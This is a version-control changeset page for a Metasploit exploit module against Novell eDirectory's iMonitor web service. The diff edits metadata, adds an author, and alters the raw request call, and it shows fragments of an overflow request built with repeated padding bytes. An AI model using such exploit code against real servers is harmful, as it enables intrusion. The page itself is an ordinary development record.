Changeset 5509
- Timestamp:
- 05/20/08 15:55:01 (4 months ago)
- Files:
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework3/trunk/modules/exploits/windows/http/edirectory_imonitor.rb
r4419 r5509 1 1 ## 2 # $Id :$2 # $Id$ 3 3 ## 4 4 … … 28 28 29 29 }, 30 'Author' => [ 'anonymous' ],30 'Author' => [ 'anonymous', 'Matt Olney <scacynwrig@yahoo.com>' ], 31 31 'License' => BSD_LICENSE, 32 32 'Version' => '$Revision$', … … 73 73 uri << "B" * 0xD0 74 74 75 res = c.send_request(c.request ({ 'uri' => uri }), -1)75 res = c.send_request(c.request_raw({ 'uri' => uri })) 76 76 sleep(4) 77 77
